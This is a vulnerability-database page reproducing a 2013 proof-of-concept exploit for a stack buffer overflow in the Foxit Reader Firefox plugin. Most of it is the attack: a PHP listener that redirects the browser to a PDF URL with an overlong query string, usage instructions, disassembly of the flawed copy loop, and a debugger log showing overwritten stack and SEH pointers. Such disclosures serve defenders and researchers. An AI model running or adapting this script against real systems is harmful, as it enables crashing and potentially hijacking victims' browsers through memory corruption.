Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Foxit Reader <= 5.4.4.1128 Firefox Plugin Stack Buffer Overflow

🗓️ 07 Jan 2013 00:00:00Reported by rgodType 
zdt
 zdt🔗 0day.today👁 33 Views

Foxit Reader <= 5.4.4.1128 Firefox Plugin Stack Buffer Overflo

Code
<?php
/*
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod
 
(listener)
 
Tested against Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader 5.4.3.0920
Foxit Reader 5.4.4.1128
 
File: npFoxitReaderPlugin.dll
Version: 2.2.1.530
 
Product url: http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe
 
Usage:
Launch from the command line, then browse port 6666 with Firefox.
You can test it also through this url:
 
http://192.168.0.1/x.pdf?[A x 1024]
 
File must be existing or the server should be responding with
the proper Content-Type header.
 
vulnerable code, npFoxitReaderPlugin.dll:
 
;------------------------------------------------------------------------------
 L1000162F:
        push    ebx
        push    esi
        push    edi
        mov edi,ebp
        or  ecx,FFFFFFFFh
        xor eax,eax
        xor ebx,ebx
        xor esi,esi
        repne scasb
        not ecx
        dec ecx
        test    ecx,ecx
        jle L100016E4
 L1000164A:
        mov al,[esi+ebp]
        mov word ptr [esp+18h],0000h
        cmp al,25h
        jz  L10001661
        mov ecx,[esp+1Ch]
        mov [ebx+ecx],al
        jmp L100016CE
 L10001661:
        mov al,[esi+ebp+01h]
        cmp al,30h
        jl  L1000166D
        cmp al,39h
        jle L1000167D
 L1000166D:
        cmp al,41h
        jl  L10001675
        cmp al,46h
        jle L1000167D
 L10001675:
        cmp al,61h
        jl  L100016C6
        cmp al,66h
        jg  L100016C6
 L1000167D:
        mov dl,[esi+ebp+01h]
        inc esi
        inc esi
        lea ecx,[esp+10h]
        mov [esp+18h],dl
        push    ecx
        mov al,[esi+ebp]
        lea edx,[esp+1Ch]
        push    L100450D4
        push    edx
        mov [esp+25h],al
        call    SUB_L10006421
        mov eax,[esp+1Ch]
        lea ecx,[esp+24h]
        push    eax
        push    L100450D0
        push    ecx
        call    SUB_L100063CF
        mov eax,[esp+34h]
        mov dl,[esp+30h]
        add esp,00000018h
        mov [ebx+eax],dl
        jmp L100016CE
 L100016C6:
        mov ecx,[esp+1Ch]
        mov byte ptr [ebx+ecx],25h
 L100016CE:
        inc ebx
        mov edi,ebp
        or  ecx,FFFFFFFFh
        xor eax,eax
        inc esi
        repne scasb
        not ecx
        dec ecx
        cmp esi,ecx
        jl  L1000164A
 L100016E4:
        mov edx,[esp+1Ch]
        pop edi
        pop esi
        mov eax,00000001h
        mov byte ptr [ebx+edx],00h
        pop ebx
        pop ebp
        pop ecx
        retn
;------------------------------------------------------------------------------
 
this copy loop ends up in overwriting stack pointers, then
(by attaching to plugin-container.exe):
 
(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????
...
Attempt to write to address 41414141
...
 
also SEH pointers are overwritten
*/
 
error_reporting(0);
 
set_time_limit(0);
 
$port = 6666;
 
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                "Server: Apache\r\n".
                "Location: /x.pdf?".str_repeat("A",1024)."\r\n".
                "Content-Type: text/html\r\n\r\n";
 
$____boom     = "HTTP/1.1 200 OK\r\n".
                "Server: Apache\r\n".
                "Accept-Ranges: bytes\r\n".
                "Content-Length: 60137\r\n".
                "Content-Type: application/pdf\r\n".
                "Connection: keep-alive\r\n\r\n";
 
$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);
 
if (!$socket) {
  echo "$errstr ($errno)\n";
} else {
  echo "Listening on public tcp port ".$port." \n"; 
  while ($conn = stream_socket_accept($socket)) {
    $line=fgets($conn);
    echo $line."\n";
    if (strpos($line,".pdf")){
      fwrite($conn,$____boom);
    }
    else {
      fwrite($conn,$____redirect);
    }
    fclose($conn);
  }
  fclose($socket);
}
?>

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2013 00:00Current
7High risk
Vulners AI Score7
foxit readerfirefoxstack buffer overflow
33